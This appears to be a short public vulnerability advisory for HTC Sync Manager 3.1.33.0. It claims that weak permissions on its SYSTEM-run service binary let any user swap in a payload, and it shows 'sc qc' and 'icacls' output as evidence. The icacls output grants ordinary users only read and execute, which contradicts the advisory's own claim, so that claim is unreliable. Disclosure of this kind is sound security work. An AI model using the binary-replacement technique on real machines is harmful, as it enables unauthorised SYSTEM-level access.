# Exploit Title: HTCSyncManager 3.1.33.0 (HSMServiceEntry.exe) Service Trusted Path Privilege Escalation
# Date: 12/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.htc.com/fr/software/htc-sync-manager/
#Affected version: 3.1.33.0
#Tested on: Windows 7 (FR)
HTC Synchronisation manager for devices HTC
Vulnerability Details
There are weak permissions for 'HTCSyncManager'default installation where everyone is allowed to change
the HSMServiceEntry.exe with an executable of their choice. When the service restarts or the system reboots
the attacker payload will execute on the system with SYSTEM privileges.
C:\Users\samir>sc qc HTCMonitorService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: HTCMonitorService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HTCMonitorService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers
